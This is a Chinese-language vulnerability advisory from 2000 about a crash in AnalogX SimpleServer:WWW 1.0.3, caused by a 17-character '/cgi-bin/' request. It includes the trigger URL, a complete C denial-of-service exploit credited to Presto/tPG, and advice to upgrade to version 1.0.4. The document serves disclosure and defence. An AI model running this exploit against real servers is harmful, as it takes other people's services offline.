发布日期：2000-03-31
更新日期：2000-03-31

受影响系统：

AnalogX SimpleServer:WWW 1.0.3
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

不受影响系统：

AnalogX SimpleServer:WWW 1.0.4
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

---

如果一个URL内容是"/cgi-bin/"后面跟着一个8字符长的字符串(URL总长度为17个字符)，当向
AnalogX SimpleServer WWW 1.03 Web服务器传送这个URL请求时，将导致SimpleServer服务器
停止响应。


<* 来源：Presto Chango <presto@regiononline.com> *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://target/cgi-bin/<任意8个字符长的字符串>


/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/


#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>


void main(int argc, char *argv[])
{
  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,foreign=0;
  char ojsimp[20];
  char *okay[2];
  char *player[2];


  okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
  player[1] = "Check if its running now.";




  if (argc<2)
  {
    printf("\n HOSTNAME PLEASE@!# ");
    exit(0);
  }
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
  printf("\n\n\t Crash Exploit for AnalogX SimpleServer
v1.03\n\n");
  start=inet_addr(argv[1]);
  counter=ntohl(start);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);


  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
  }
  printf("\n\n HTTPD Version. \n");
  getchar();
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  recv(sock, buffer, sizeof(buffer),0);
  printf("%s",buffer);
  close(sock);
  printf("\n\t Press something. \n");
  getchar();
  while(count++ < 2)
  {
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
    {
      perror("connect");
    }


    printf(" %s : ",player[count]);
    for(numin=0;numin < 20;numin++)
    {
      ojsimp[numin] = '\0';
    }
    send(sock, okay[count],strlen(okay[count]),0);
    recv(sock, ojsimp, sizeof(ojsimp),0);
    cgistr = strstr(ojsimp,foundmsg);


    if( cgistr != NULL)
    {
      printf("Heh.\n");++foreign;
    }
    else printf(" tPG\n");


    close(sock);
  }
  if (foreign)
  {
    printf("bl3h. bl4h. h3h. w00p. 33p.\n");
  }
}



建议：

---

AnalogX 已经发布了SimpleServer:WWW 1.0.4版本，它已经解决了这个问题。建议尽
快升级到新版本：

http://www.analogx.com/files/sswwwi.exe

浏览次数：6530
严重程度：0（网友投票）